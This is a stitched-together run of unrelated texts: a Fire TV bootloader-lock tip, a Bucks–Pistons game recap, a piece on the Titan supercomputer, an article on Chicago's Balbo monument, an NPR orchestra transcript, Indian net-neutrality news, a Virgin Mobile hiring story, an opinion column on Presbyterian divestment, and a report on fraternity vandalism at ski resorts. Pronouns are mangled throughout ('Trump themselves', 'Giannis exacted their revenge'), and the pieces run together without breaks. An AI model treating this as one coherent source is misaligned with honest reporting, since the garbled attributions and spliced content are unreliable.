You should leave the aftv-unlock file on your Fire TV incase you ever need to lock your bootloader, which you do by running the command: /data/local/tmp/aftv-unlock lock
SourceXDA-Developers
Follow AFTVnews on Twitter / Facebook and subscribe via email to be the first to learn when new articles go live. Follow me, Elias Saba, on Twitter and Instagram to see what I'm working on before it's posted here.
ShareTweetShare+1
Few medicines go down smoother than dominating an ailing team, and the Bucks guzzled down their Pepto gleefully tonight, destroying the Detroit Pistons, 119-94. A close match in the first half broke wide open in the third, as Milwaukee dominated in the paint and from behind the three-point line led by Jabari Parker and Giannis Antetokounmpo.
Jabari was an absolute force all night, scoring 31 points on 4-7 from three with nine rebounds, seven assists and a steal, inching closer to a triple-double than their running mate. Giannis still lodged a healthy 23 points, five rebounds, eight assists, and two steals. Greg Monroe added a stat-stuffing 14 points, five rebounds and six assists against their former squad. Delly and Snelly had 11 each, going a combined 5-5 from deep. Thon made an appearance and missed a few threes, but nailed a pull-up jumper. Mitchell, Frank and I discussed the festivities in podcast form shortly after the final buzzer:
Download MP3 Audio
Tobias Harris was the only standout for Detroit, at least offensively, managing 23 points and 12 rebounds on the night. Reggie Jackson scored fourteen with six assists and Andre Drummond added 16 points and nine boards, but Jackson didn't score in the second half while Drummond managed only four. Noted Bucks killer Kentavious Caldwell-Pope scored only six, all of those coming in the first quarter, and went 3-7 without a three-point attempt on the night.
Caldwell-Pope's reticence from the three-line didn't stop Detroit from actually exceeding its season average (22) from deep with 24 attempts, the problem was they only hit six of them. Milwaukee, meanwhile, poured in 11-22 and shot 57% from the field to Detroit's 44%. Detroit managed only four fast-break points while Milwaukee got to 15, ten of those coming in the second half.
Delly slipped a pass under the hoop to a cutting Parker to start the game's scoring, followed by a Giannis mid-paint pull-up against poor, spindly Jon Leuer to put the Bucks up early. The teams traded buckets for some time, but Parker kept going strong, nailing a three and pounding their way to the hoop for a bucket against Leuer to make it 17-16 at the first break. Andre Drummond flummoxed the Bucks' defense coming out of the commercial by merely rolling to the rim, as Monroe and the back line defense failed to contain them en route to 10 points on the quarter as Milwaukee led 31-28 after one. Giannis came in for the last minute or so, but finished with only two points on 1-2 shooting, with Jabari leading the way at 11 points. Kentavious Caldwell-Pope added six for Detroit.
Giannis worked on a give-and-go with Monroe early in the second to start the scoring, and slammed so hard on Tobias Harris I'm pretty sure they erased any lingering memories Harris had of their time in Milwaukee:
Giannis finished off a personal 7-0 run by giving Leuer memories of sliding down icy Bascom Hill on a finish in the lane, followed by an and-one layup against Ish Smith. A Delly three put the Bucks ahead 41-34, but Detroit answered with an 8-0 run capped by Tobias Harris and Reggie Jackson plunking home three pointers to put them up 42-41 with six minutes to go. The Bucks responded with a three parade, as Snell and Delly splashed their own before Parker nailed two open looks to regain a 53-47 lead. Giannis got up to Giannis things right after, finishing in transition and out-hustling the Pistons on the boards with an and-one layup giving Milwaukee an 11-point lead. Jackson ended the half with a monstrous slam over Giannis, but Detroit still trailed 62-54.
Jabari had 19 on the half on 8-11 shooting, 3-5 from three, and Giannis had 13 points and five assists, finishing 5-6 from the free throw line. Delly chipped in nine going 2-2 from deep. Reggie Jackson had 14 points, with Drummond and Tobias Harris tossing in 12 a piece. Milwaukee shot 54% on the half compared to Detroit's 50%, but the Bucks went 7-11 (64%) from deep to Detroit's 3-11 (27%).
Jon Leuer opened the second half with a bucket, which Giannis one-upped with a three-pointer on the other end. After a wicked Parker pull-up, Andre Drummond hit a putback off a bad KCP miss to make it 68-58. Giannis exacted their revenge on Jackson for their first half dunk-cap, with a thunderous transition slam off a Jabari steal as Milwaukee led 70-60. Milwaukee broke the game open to close the third, using all parts of the halfcourt to dominate down low and out top as Jabari hit their fourth three of the night before Milwaukee went into the fourth leading 90-75.
Milwaukee extended their lead to start the fourth, with a Giannis hesitation layup and-one over Baynes putting them up 99-80. Giannis nailed a pull-up jumper minutes later with Johnson draped all over him, and then a Jabari and-one put Milwaukee up 106-84. The Bucks didn't let up, and the starters eventually left with about three minutes left and Milwaukee leading 115-89. Thon nailed a pull-up jumper while Plumlee slammed home an dunk that I think made the basket cha-ching like an old-timey cash register. The Bucks won out, 119-94.
Thoughts:
Tobias Harris certainly isn't known for their defense, but they did an excellent job keeping their feet in front of Parker in the first quarter, stopping Jabari when they tried one of their super-speed hesitation crossovers in the paint. Parker got them back a bit later though. Real recognize real:
The Prez finds Jabari cutting through for the SLAM!! #OwnTheFuture https://t.co/HMtKPze9X4 — Milwaukee Bucks (@Bucks) December 29, 2016
Andre Drummond roasted Milwaukee on simple pick-and-rolls in the first quarter. It seems pretty tough to lose a man that monstrous literally barreling to the rim, but Milwaukee's back line defense of Greg Monroe and Jabari Parker struggled to contain them as they rolled to the tin time and again.
Reggie Jackson blocked Greg Monroe's dunk attempt tonight. Monroe notably lacks a bit of lift, but ooh boy that's never a fun sight.
Jason Kidd got a technical foul after a second quarter break, directly after Tony Snell hit a three to give Milwaukee the lead back and snap an 8-0 Pistons run. Not the best timing coach.
Here's an entertaining article from the Wizards site, Truth About It about asking players the best way to guard Giannis. Near the end, Giannis concedes the only way to guard them is just by playing harder. A second quarter sequence when they missed a layup, tipped it to themselves and nabbed a second and third board against Tobias Harris exemplified the difficulty in that:
They cannot be denied.
Giannis Antetokounmpo #NBAVote https://t.co/y8bTSgOKwd — Behind the Buck Pass (@BehindTheBucks) December 29, 2016
SPEED fanatics that they are, computer nerds like to check the website of Top500, a collaboration between German and American computer scientists that keeps tabs on which of the world's supercomputers is the fastest. On November 12th the website released its latest list, and unveiled a new champion.
The computer in question is called “Titan”, and it lives at Oak Ridge National Laboratory, in Tennessee. It took first place from another American machine, IBM's “Sequoia”, which is housed at Lawrence Livermore National Laboratory, in California. These two machines have helped reassert America's dominance of a list that had, in the past few years, been headed by computers from China and Japan.
Get our daily newsletter Upgrade your inbox and get our Daily Dispatch and Editor's Picks.
Titan is different from the previous champion in several ways. For one thing, it is an open system, meaning that scientific researchers with sufficiently thorny problems will be able to bid for time on it, in much the same way that astronomers can bid for time on telescopes. Sequoia, by contrast, spends most of its time running hush-hush simulations of exploding nuclear weapons, and is therefore rarely available for public use.
Titan has an unusual design, too. All supercomputers are composed of thousands of processor chips harnessed together. Often, these are derivatives of the central processing units, or CPUs, that sit at the heart of modern, desktop machines. But Titan derives the majority of its oomph—more than 90%—from technology originally developed for the video-game industry. Half of its 37,376 processors are ordinary CPUs. But the other half are graphics processing units, or GPUs. These are specialised devices designed to cope with modern video games, which are some of the most demanding applications any home machine is ever likely to run. China's “TianHe-1” machine, a previous Top500 champion, was built in the same way, as are 60 other machines in the Top500 list.
Parallel worlds
Broadly speaking, a CPU—which will be expected to run everything from spreadsheets to voice-recognition software to encoded video—has to be a generalist, competent at every sort of mathematical task but excelling at nothing. A GPU, by contrast, is designed to excel at one thing only: manipulating huge numbers of the triangles out of which all modern computer graphics are made.
Several years ago researchers at Nvidia and AMD (the two companies that produce most of the world's high-performance GPUs) realised that many scientific problems which demand huge amounts of computing power—everything from climate simulations and modelling combustion in an engine to seismic analysis for the oil-and-gas industry—could be translated into a form that was digestible by their GPUs. Soon after, supercomputer builders such as Cray (which put Titan together using Nvidia's GPUs) began to take notice.
Borrowing from the games industry in this way brings several benefits. One big one is efficiency. Titan is an upgrade of Oak Ridge's existing “Jaguar” machine. Upgrading Jaguar with ordinary CPUs would have meant building a computer that sucked around 30MW of electricity when running flat out—enough juice to power a small town. Because GPUs are so good at their specialised tasks, Titan can achieve its blistering performance while sipping a (relatively) modest 8.2MW.
It makes sense financially, too, says Sumit Gupta, head of supercomputing at Nvidia. The chips that the firm sells to supercomputer-makers are almost identical to those it sells to gamers. As Dr Gupta observes, “The history of high-performance computing is littered with the bodies of firms that tried to build products just for the supercomputing market. By itself, it's just too small a niche.”
It is not all upsides, though. Machines like Titan achieve their speed by breaking a problem into thousands of tiny pieces and farming each out to a single processor. A helpful analogy, perhaps, is painting a house: one strategy might be to hire a single painter, but it is probably quicker to employ several people and give each a room to do.
Not all problems are susceptible to being chopped up in such a way, though (hiring a dozen barbers, to take another analogy, is unlikely to speed up a haircut significantly). The requirement to translate a problem into the sort of mathematics that a GPU can digest adds another barrier. Dr Gupta gives the example of the models used to simulate how a car will react in a crash as one problem that has so far resisted what the industry calls the “massively parallel” approach. Clever programmers can sometimes find a way around such issues: ray-tracing, a high-quality, mathematically intense approach to computer graphics that aims to simulate individual light rays, was, ironically, long thought to be the kind of problem that a modern GPU would struggle with. Yet at a graphics conference in 2008, a group of researchers from Nvidia announced that they had, nevertheless, found a way to do it.
Oak Ridge and Nvidia plan to work with scientists wanting time on Titan to see if their algorithms can be tweaked in similar ways, to make them digestible by the new machine. Dr Gupta is bullish. Even the recalcitrant car-crash simulations, they think, will yield to the new approach soon. But that is not to say that every problem can be made to work. And those scientists who find that they cannot tweak their code may find themselves struggling to take advantage of the ever-rising performance of the world's fastest computers.
Every now and then, for the more than 80 years it has stood outside Soldier Field on Burnham Harbor, the Balbo monument — a slender, 18-foot tall column of greenish breccia rock, perched at the foot of the bike path — has unnerved many Chicagoans.
That is, the ones who knew its history.
It was a gift to Chicago from fascist dictator Benito Mussolini, erected in 1934 to commemorate a celebrated trans-Atlantic flight of 24 11-ton seaplanes from Rome to Chicago. The namesake of the monument was the leader of that voyage, General Italo Balbo, an Italian aviator who had been central to Mussolini's rise to power and later became one of their most feared warlords. Not long after their visit to Chicago, Balbo led the bombing of unarmed Africans in Ethiopia. As fascism spread across Europe in the 1930s, their tactics were celebrated in speeches by no less than Hitler.
Should you lean in, the faded inscription at the base to the Balbo monument is chilling. It reads, in part: “Fascist Italy with the sponsorship of Benito Mussolini presents to Chicago” this commemoration of a flight by Balbo “in the 11th year of the Fascist Era.”
It is, in short, public art from a fascist, honoring a fascist.
Not surprisingly then, over the past century there have been many spirited attempts to remove it. And now, in the wake of the white nationalist rally in Charlottesville, Va., that brought a fresh questioning of Confederate statues across the country, calls to remove the column — and for good measure, rename Balbo Drive — have a renewed weight.
Leading the push, Ald. Edward Burke, 14th, and Ald. Gilbert Villegas, 36th, who will propose removing the monument (and renaming the downtown street) at a City Council meeting in September. “We think the climate (for the monument's removal) is different now,” Villegas said. “The momentum is here.” They said they don't want Balbo “struck from history lessons — but we also don't want to honor those folks who don't deserve it.”
The Balbo monument was a gift to Chicago from Italian dictator Benito Mussolini. Periodically, there is a call to remove it — and rename Balbo Street — and now, because of the movement to remove Confederate statues, the possibility is looking more likely than it has in a long time.
Villegas, who didn't know the history of the monument until Burke informed him, added: “Since then I've actually had some of my staff start to research the histories of a number of other monuments in Chicago — I'm curious to see what they come up with.”
Coincidentally, Burke, a powerful, longtime Chicago politician, once served as a tax attorney to President Donald Trump, whose heavily criticized response to the Virginia rally stoked the nationwide calls for removing Confederate statues. (Trump themselves tweeted on Thursday that pulling down monuments to Robert E. Lee and others was “foolish.”)
On Thursday morning, Burke traipsed down to the monument to reacquaint himself, and though they said the inscription was mostly too weathered to read, the part about “the 11th year of the Fascist Era” riveted him. “I decided to do this as I was reading all the stories about other monuments around the country,” Burke said. “I remembered (2nd Ward Ald.) Bob Fioretti had tried to do this same thing (in 2011), which didn't go anywhere. And I thought it was surprising more people hadn't demanded this thing go.”
The aldermen's proposal comes on the heels of a few days of incensed tweets from John Greenfield, editor of the transportation website Streetsblog Chicago, and Bill Savage, an author and associate professor at Northwestern University who often teaches the literary and cultural history of Chicago, both of whom called strongly for the removal of the Balbo monument. “I guess part of it is I right by that monument a lot,” Savage said, “and always cringe a little, because frankly, as a Chicagoan, it's embarrassing. For one, it's very close to the (Gold Star) memorial to police killed on the job — why would police want to be associated closely with fascism? You go for a stroll, contemplate (officers) who made the ultimate sacrifice, and a few yards away, there's this monument to a general who symbolized hate and the ugliness of fascism. I don't get it.”
Many don't, for many reasons.
The Balbo monument seems apart from the Museum Campus. It is surrounded by the greenest and fullest of trees, so dense and full it's hard to see towering Soldier Field just beyond. Spiders weave doilies of webs on a black iron fence that curls past it. And yet the monument itself is less elegant than battered, grim and solid. A breeze lifts off the harbor and shussssshes leaves, and you guess, not even a hurricane could budge this.
Bicyclists zoom by every minute. Followed by runners. Then families. Very few stops or even regard the monument or read its inscription; indeed, compared with the solemn Civil War soldier atop Confederate Mound in Oak Woods Cemetery on the South Side, the Balbo column is an innocuous abstraction — an ancient pillar in search of a temple.
A jogger stops.
Mike Cramarosso, a Chicago lawyer, towels off their face and catches their breath and grins: “Mussolini's work, right? Pretty amazing it's here, isn't it? I came across it one time when I was relieving myself near it, though I resisted the urge to go on Mussolini.”
They look closely at it.
“No one knows it's here, you know? It's not in your face like Civil War stuff, I suppose.”
A man stops on their bike.
“You guys know anything about this statue?” they ask.
Their name is Gregory Raclaw. They wear an orange shirt and black riding shorts, and they look so eager to discuss Balbo, before you can answer, they answer: “I mean, can't they just remove the ‘Mussolini'? Keep the monument and erase the name? I bet 99 percent of the people who pass it every day have no idea what they are looking at anyway. What are we going to start doing, eradicate every statue in this country that we don't like?”
In 1933, Chicago really liked Italo Balbo.
The horror of the Nazis was not yet widely realized in this country, and fascist populism had its mainstream supporters. Balbo's flight coincided with the Century of Progress World's Fair and proved so spectacular, there were parades down Michigan Avenue in their honor. Balbo was feted by Chicago's upper class. Loyola University gave them an honorary degree. Within a year, Mayor Ed Kelly had renamed 7th Street as Balbo Drive, and Mussolini's gigantic gift was erected, standing at the entrance to the Italian Pavilion at the 1934 World's Fair, where it stayed long after the World's Fair itself vanished.
But almost from its installation, questions were raised. The column itself, which is more than 2,000 years old, had a sketchy history, being likely pilfered from a seaside Italian ruin by Mussolini — whose military ancestors had likely pilfered it themselves from the Greeks.
Community Orchestra Makes A Healthy Dose Of Music
A lawyer, a doctor and an engineer walk into an orchestra rehearsal. It's not the set-up of a joke, it's what happens every week at rehearsals for the National Institutes of Health Community Orchestra. The volunteer group draws it's members from all over Washington, D.C., and is a creative outlet for government and private sector employees alike. NPR's Serri Graslie is a member of the group and has an audio postcard from their latest concert.
GUY RAZ, HOST:
So a lawyer, a doctor and an engineer walk into an orchestra rehearsal, which actually happens every week at the National Institutes of Health Community Orchestra. It's the kind of place where CIA operatives and political operatives make up the string section. NPR's Serri Graslie is a member of the group, and they sent us this audio postcard.
SERRI GRASLIE, BYLINE: A few weeks ago, Dan Walshaw took the podium to conduct their fourth concert with the group.
DAN WALSHAW: Good afternoon. Welcome to our winter concert.
GRASLIE: If they sound a little nervous, it's probably because he's worried about how to effectively conduct a group that's grown so big it spills into the wings of this high school stage.
WALSHAW: All right. Enjoy. Here's the (unintelligible).
(SOUNDBITE OF MUSIC)
GRASLIE: Despite the National Institutes of Health name, the group is open to everyone. In fact, it has nearly tripled in size in just a year thanks to word of mouth and a flood of 20-somethings looking for a place to play after college. Its members range from interns to high-level government employees with top secret security clearances.
UNIDENTIFIED WOMAN #1: I'm a lawyer...
...like many people in D.C.
UNIDENTIFIED MAN #1: I work as a lawyer for the Federal Deposit Insurance Corporation.
UNIDENTIFIED WOMAN #2: We're not all lawyers.
(SOUNDBITE OF LAUGHTER)
UNIDENTIFIED WOMAN #2: I am an engineer, and I manage research for the National Science Foundation.
UNIDENTIFIED WOMAN #3: I'm a paralegal moonlighting as a bartender.
UNIDENTIFIED MAN #2: I'm a consumer safety officer. I protect the nation's food supply.
UNIDENTIFIED MAN #3: My day job is I'm a toxicologist, chemist in the National Cancer Institute (unintelligible) cancer prevention.
GRASLIE: In a city that's all about who you know and what you do, this is one of the few places where neither seems to matter. Walshaw says it's one of the things they love about the group.
WALSHAW: The thing here, we have so many brilliant people who do amazing things with their lives, and then they come here every Wednesday night and play music. It's really wonderful.
GRASLIE: I talked to some of the orchestra members after the concert about what brought them here and why they stay.
TOM HOLTZMAN: I'm Tom Holtzman(ph). I'm a biologist.
JANE CODA: I'm Jane Coda(ph), and I play second violin.
ANGELA GARONEY: My name is Angela Garoney(ph) and I play the upright bass. I wasn't able to play in law school, and I missed playing. I felt law kind of drains any creativity.
JAY CODA: I played as a kid in elementary school. But I gave it up, and I always regretted it. I said, when I'm retired, I was going to do that as my hobby. So, I did.
GARONEY: And I like that it's all ages because to me it's kind of precious to look over and see like a little old person playing with you. And...
HOLTZMAN: You know, at my age, I don't get to interact a lot with younger people, and they're a lot of fun.
CODA: It really reminds me that you can keep playing your whole life.
GRASLIE: For its conductor, the orchestra is more than just a creative outlet for Washingtonians.
WALSHAW: To me, this represents the future of classical music in America.
GRASLIE: Again, Dan Walshaw.
WALSHAW: Major orchestras are losing their budgets. And because of that, if we don't have the community orchestras, the smaller ensembles, the amateurs playing, classical music will die because professionals out there won't have other classical music lovers to play for. So groups like this are the only thing that will save music in this country.
(SOUNDBITE OF MUSIC)
GRASLIE: For NPR News, I'm Serri Graslie.
(SOUNDBITE OF MUSIC)
Copyright © 2012 NPR. All rights reserved. Visit our website terms of use and permissions pages at www.npr.org for further information.
NPR transcripts are created on a rush deadline by Verb8tm, Inc., an NPR contractor, and produced using a proprietary transcription process developed with NPR. This text may not be in its final form and may be updated or revised in the future. Accuracy and availability may vary. The authoritative record of NPR's programming is the audio record.
NEW DELHI: Internet access in India should remain nondiscriminatory and telecom companies and internet providers should place no restrictions in the delivery of content through practices such as throttling of speeds, blocking, paid prioritisation or preferential treatment, Telecom Regulatory Authority of India said on Tuesday, making a strong case for backing net neutrality in the country.Also, dissemination of futuristic technologies such as internet-of things (IoT) has been included in the non-discriminatory delivery regime. Trai , however, kept “specialised services or other exclusions” out of the net neutrality ambit.Trai also allowed “reasonable traffic management practices” to telecom companies to give them space for managing the quality of services. Specialised services, say industry watchers, may include niche (not mass-market) and up-and-coming services such as tele-surgery and autonomous driving, though Trai did not make any specific mentions.The regulator --which had issued a consultation paper on net neutrality in January and has since held several rounds of consultations with stakeholders -- said a tighter vigil is required over the telcos and other content delivery companies to ensure compliance. It suggested the formation of a multi-stakeholder body to ensure that net-neutrality principles are adhered to and there are no violations of any kind.Trai chairperson R S Sharma told TOI , “The overarching goal for us has been that internet must remain an open platform, unhindered by any entity, so that users and customers have a choice to access content of their liking… Nobody owns the internet and thus it should be available to everyone. We seek openness and integrity of the internet.”As it spelt out detailed recommendations which will now be taken up by the telecom ministry to formalise the government's formal views on the subject, Trai said, “… increasingly, concerns have been raised globally as well as in India relating to the potential for discriminatory treatment of internet traffic by the entities that control access to the internet. These concerns regarding non-discriminatory access have become the centre of a global policy debate, often referred to as the debate on “network or net neutrality”.
Virgin Mobile CEO: It's not hard to hire in KC
It's been just over a year since Virgin Mobile USA selected Kansas City as the location for its new headquarters, relaunching as a subsidiary of the Overland Park-based wireless giant Sprint.
Since then, the firm has moved into a swanky, downtown office and hired 65 people. A handful of positions are still available.
Although finding the best talent might have been an earlier concern, Virgin Mobile CEO Dow Draper said, hiring qualified people in Kansas City wasn't a challenge.
“I remember asking before deciding on Kansas City, ‘Is there actually going to be enough people together to pull together the right ecommerce team?'” Draper said Wednesday at the KC Tech Council's Tech CEO Speaker Series. “That was our biggest concern, how to attract great people. It has actually been a lot easier than we thought it would be. It has not been hard.”
The Virgin Mobile team is full of “doers” who have worked extra hard preparing for the launch, they said.
“It's all about the people. It really is,” Draper said. “This is a group that I would put up against anybody. When you hire good people, they can step up and they can do it and we had a team that stepped up. I'm extremely blessed that we have the right folks.”
The downtown location was partially responsible for the firm's ability to attract talent, Draper added. Virgin Mobile signed a lease in January at One Kansas City Place at 1200 Main St. in downtown Kansas City.
“There are so many great things going on in Kansas City right now,” Draper said. “What's happening downtown and in the Crossroads is so great, and if the city were to let off the gas on that, it would be a travesty.”
Although Draper touts Kansas City as a great place to be, it wasn't their natural first pick. Marcelo Claure, Sprint CEO, told Draper that they could put the Virgin Mobile headquarters wherever they wanted, they said.
“We had some choices,” Draper said. “My first thought was that we're going to Seattle. Then my wife and daughter were like, ‘Looks like you're going on your own.' They love it here, they'll be in Kansas City forever.”
The Kansas City Area Development Council led a multi-organizational effort to attract Virgin Mobile to Kansas City. In addition to family life, Kansas City's low cost of living closed the deal for Draper.
“It's crazy how inexpensive it is to be here,” Draper said. “I can't believe what we pay for the downtown building. We can't beat the cost.”
In 2009, Sprint — then Sprint Nextel — purchased Virgin Mobile in a $483 million deal to focus on pre-paid phone sales. English business mogul Sir Richard Branson founded the Virgin Group, of which Virgin Mobile USA was a part. The conglomerate owns more than 400 companies around the world.
In efforts to establish a brand independent from Sprint, Draper said, it was important for the firm to find a location outside of the Sprint campus. Yet, they are glad the Virgin Mobile headquarters' proximity to Sprint allows for collaboration, they said.
The firm operates more like a startup than a corporation, said Justin Scott, Virgin Mobile director of communications.
“Virgin is a disrupter brand and very much a startup,” Scott said. “We're digital focused and digital first. We are a small but focused team, which enables us to have a startup mentality, doing things quicker and with quicker pivots.”
In September, the edgy Virgin Mobile headquarters — designed by Kansas City-based GastingerWalker& — will open its doors officially, complete with bright red paint, a Virgin Wines rack, a Virgin Mobile neon sign and a photograph of Sir Richard Branson, founder of the Virgin Group.
Draper hopes to continue to tap into the growth of the Kansas City startup community, they said.
“Despite the great things going on here, there are challenges,” they said. “One thing is the diversity and equality challenge in Kansas City. Then there's the airport terminal, schools that need to be invested in, crime rates … But Kansas City is on the right path, I think the sky's the limit in this place.”
Facebook Comments
WASHINGTON, July 17, 2014 — In June, the Presbyterian Church (USA) voted to endorse divestment as a protest against Israel's 50-year occupation of Palestine. Almost immediately, it was accused of “anti-Semitism,” even involvement with a former Ku Klux Klan leader.
This is an interesting example of tactics which have been used for many years to silence criticism of Israel — tactics which no longer work to intimidate those who believe that the occupation is illegal, violates the human rights of Palestinians, and is an impediment to peace — all positions which reflect official U.S. policy on the subject.
The church's General Assembly, meeting in Detroit, voted to sell stock in Caterpillar, Hewlett-Packard and Motorola Solutions, companies whose products Israel uses in the occupied territories.
READ ALSO: The largely untold story: Rescuing Jews in Mussolini's Italy
Major American Jewish organizations lobbied the Presbyterians to defeat the divestment vote. More than 1,700 rabbis signed an open letter opposing the resolution. Rabbi Rick Jacobs, head of the Union for Reform Judaism, addressed the assembly and offered to broker a meeting between Israeli Prime Minister Benjamin Netanyahu and the church's two top leaders so they could convey the church's concern about the occupation, on the condition that the divestment measure was defeated.
According to The New York Times, “That offer appears to have backfired, with some saying afterward that it felt both manipulative and ineffectual, given what they perceive as Mr. Netanyahu's approval of more settlements in disputed areas and lack of enthusiasm for peace negotiations.”
The Times notes that, “Of more influence was the presence at the church's convention all week of Jewish activists, many of them young, in black T-shirts with the slogan ‘Another Jew Supporting Divestment.' Many of them were with Jewish Voice for Peace (JVP), a small but growing organization that promotes divestment and works with Palestinian and Christian groups.”
READ ALSO: Political correctness attacks Christianity on college campuses
JVP director Rabbi Alissa Wise spent a week inside the convention center and spoke at a prayer service. They said that divestment can serve a constructive purpose. “To me this helps Palestinians build their power, so that Israel is convinced, not by force, but by the global consensus that something has to change.”
The American companies from which the Presbyterians divested play an important role in Israel's occupation policies.
Caterpillar sells heavy equipment used by the Israeli government in military and police actions to demolish Palestinian homes and agricultural lands. It also sells heavy equipment used in the occupied Palestinian territory for the construction of illegal Israeli settlements, roads solely used by Israeli settlers, and the separation wall extending across the 1967 “Green Line” into East Jerusalem and the West Bank. The number of outstanding demolition orders in East Jerusalem alone has been estimated at up to 20,000.
Motorola Solutions provides an integrated communications system, known as “Mt. Rose,” which is used by the Israeli government for military communications. It also provides ruggedized cell phones to the Israeli army which it uses in the occupied territories.
Hewlett-Packard provides biometric equipment to monitor only non-Jews at several checkpoints in the West Bank. West Bank Palestinians, who number 2.4 million, are required to submit to lengthy waits as well as the mandatory biometric scanning, while Jewish Israelis and other passport holders transit without being subjected to scanning or comparable delays.
Shortly before the Presbyterian vote, South African Archbishop Desmond Tutu addressed the church in an open letter: “The sustainability of Israel as a homeland for the Jewish people has always been dependent on its ability to deliver justice to the Palestinians. I know firsthand that Israel has created an apartheid reality within its borders and through its occupation. The parallels to my own beloved South Africa are painfully stark indeed.”
READ ALSO: Supreme Court confirms religion's historic role in American society
The response from the organized Jewish community to the Presbyterian vote was swift, and the rhetoric extreme. In a June 22 tweet, American Jewish Committee Global declared that, “All you need to know about Presbyterian divestment step against Israel — extremist David Duke endorses it.” Rob Jacobs of the right-wing Zionist group StandWithUs declared, “Incredible! The former head of the Ku Klux Klan David Duke endorsed and applauds Presbyterian divestiture.” The Atlantic's Jeffrey Goldberg went further and declared twice, without any substantiation whatever that Duke “claims credit for devising Presbyterian Church strategy.”
Duke, who had nothing whatever to do with the Presbyterian vote, must be pleased with the publicity Jewish groups have given him.
Rabbi Steve Gutow, president of the Jewish Council for Public Affairs, called the divestment action “outrageous” and said it would have a “devastating impact” on relations between the national church and mainstream Jewish groups. Israeli Prime Minister Netanyahu called the Presbyterian vote “disgraceful.” Jane Eisner, editor of the Jewish newspaper The Forward, writing from Israel, declared, “how can I think this isn't about the Jews? And that, my Presbyterian friends, is anti-Semitism.”
Jonathan Tobin, writing in Commentary, accused the Presbyterians of allying themselves “with haters like David Duke” and declared that “radicals tainted by anti-Semitism have hijacked (the Presbyterian Church) leadership … this move was motivated by intolerance and hate.” In its official statement, the American Jewish Committee said the Presbyterian divestment action was “driven by hatred of Israel.”
While many in the organized American Jewish community continue to charge anyone who criticizes Israel with “anti-Semitism,” this trivialization of genuine bigotry is difficult to maintain in the face of an increasing number of Jewish voices to be heard defending the Presbyterian decision, and sometimes even lamenting that the church did not go further.
Writing in the Jewish journal Tikkun, Cantor Michael Davis, a member of the JVP Rabbinical Council, declares, “I, as an Israeli national who served three years in the IDF, and who has served the Jewish community of Chicago for over 20 years, support the right of our Presbyterian friends to freely explore their conscience on divesting from American companies that benefit from Israel's illegal occupation of the West Bank … Under international and American law, Israel's occupation of the West Bank is illegal. Any business involved in the occupation is therefore illegal too.”
M.J. Rosenberg, also writing in Tikkun, states that, “There are hundreds of thousands, maybe a few million good Israelis who are desperate for outside help to end the occupation. This (Presbyterian) resolution provides hope … The Presbyterian resolution targets only the occupation which is fair and right. I believe that being pro-Israel requires opposing the occupation. The resolution is pro-Israel, pro-Palestinian and, above all, pro-peace.”
After the Presbyterian vote, JVP declared that it “congratulates and celebrates … the vote … The church has a long history of ethical investment choices and it is a strong signal of its commitment to universal human rights that it chose to divest. This is a turning point.”
Two smaller U.S. religious groups have divested in protest of Israeli policies in the occupied territories: the Friends Fiduciary Corp., which manages assets for U.S. Quakers, and the Mennonite Central Committee. Earlier in June, the pension board of the United Methodist Church, the largest mainline Protestant group in the U.S., revealed plans to sell holdings in G4S, which provides security equipment and has contracts with Israel's prison system.
The idea that American Jews are united in support of the Israeli government, whatever it may do, is one which mainstream Jewish groups have long promoted, along with the notion that challenging the Israeli government constitutes “anti-Semitism.” It has used this tactic to intimidate open discussion and debate. The Presbyterians, along with the Quakers, the Mennonites and many others have shown that they no longer fear such false attacks. More and more Jews are standing with them, making it clear that they disapprove of Israel's policies in the occupied territories.
As JVP's Cantor Davis wrote, “Christians, like Jews, have a special interest in what happens in the Holy Land and a special responsibility to its peoples. The Presbyterian Church should be free to debate the issues on their merits without fear of being branded anti-Semites, or any other harsh responses that have been circulating in the Jewish community. Let us show our Christian neighbors the same respect that we expect and enjoy from them.”
In the end, charges of “anti-Semitism” and association with neo-Nazis and the Klan tells us nothing whatever about the Presbyterian Church, but a great deal about those attempting to silence it.
University of Michigan fraternity members are accused of causing significant damage to 45 rooms, including ths hallway pictured here, at Treetops Resort in Dover Township near Gaylord in Michigan. (Photo: Keith Wilkinson)
The two ski resorts that have accused six University of Michigan fraternities and sororities of vandalizing dozens of rooms nearly two weeks ago now say damage estimates are nearly $125,000.
Treetops Resort manager Barry Owens said Tuesday the damage estimates approach $100,000. And Erin Ernst, spokesperson for Boyne Highlands, said that resort sustained at least $25,000 in damage and that figure might continue to climb as more quotes for repair and replacement are completed.
Ernst said the students will be held responsible for loss of revenue for the units while repairs are taking place.
Ernst said the resort has filed a report with the Michigan State Police and legal action might be pursued.
The U-M fraternities and sororities have been suspended by their national offices and a criminal investigation is under way by State Police.
"We would very much like to be able to press charges," Owens said.
The Sigma Alpha Mu fraternity was the first to be suspended last week and the remaining five were suspended over the weekend.
Sigma Delta Tau sorority, Pi Kappa Alpha fraternity, Alpha Phi sorority, Chi Psi fraternity and the Delta Gamma sorority were also suspended after being accused of causing damage at the Treetops Resort and condominiums at Boyne Highlands near Harbor Springs.
"This gives the university time to sort out additional details that are necessary before placing additional sanctions on the organizations or individuals involved," the university said in a statement. "The executive boards of the Interfraternity Council and Panhellenic Association on the Ann Arbor campus have initiated their own reviews of this situation that could lead to sanctions against the fraternity and sorority chapters."
Owens said more than 120 fraternity and sorority members damaged 45 rooms, causing significant damage to ceiling tiles in the hallway, broken furniture, broken windows.
Boyne Highlands officials said between 100 and 120 students stayed in multi-bedroom cottages and townhouse units. The students caused varying degrees of damage to 12 individual condo units, ranging from holes in drywall, to soiled carpeting and upholstery and broken furniture.
Owens said the students were escorted from the premises by the State Police.
An open letter of apology was posted on the Central Student Government's website over the weekend, which called the incident "an act of shocking disrespect."
"The fraternity has said they plan on taking care and reimbursing us for all of our losses and everything else," Owens said. "They've apologized to the resort here directly and that's a good start. We talked to the university and they said they plan on doing things and pursuing things and holding people accountable."
The letter was penned by Student Body President Bobby Dishell, Interfraternity Council President Alex Krupiak and Panhellenic Association President Maddy Walsh.
"We, as leaders and Greeks at the University of Michigan, do not tolerate these kinds of acts, nor do we let such behavior fall under the radar," the letter states. "We intend to handle this situation with the utmost efficiency and we will ensure that those responsible for the damage to the properties will be held accountable throughout this process."
They said they are "deeply sorry" that the "misbehavior of a few individuals has caused harm not only to the property, but to the communities at large."
"The events that occurred last weekend deface the honor we place upon each of these values and we would like to express our regret that such unprincipled action reflects so poorly on our community," the student leaders wrote.
Dishell, Krupiak and Walsh promised swift action in the coming weeks from the Greek community to "enforce accountability and justice."
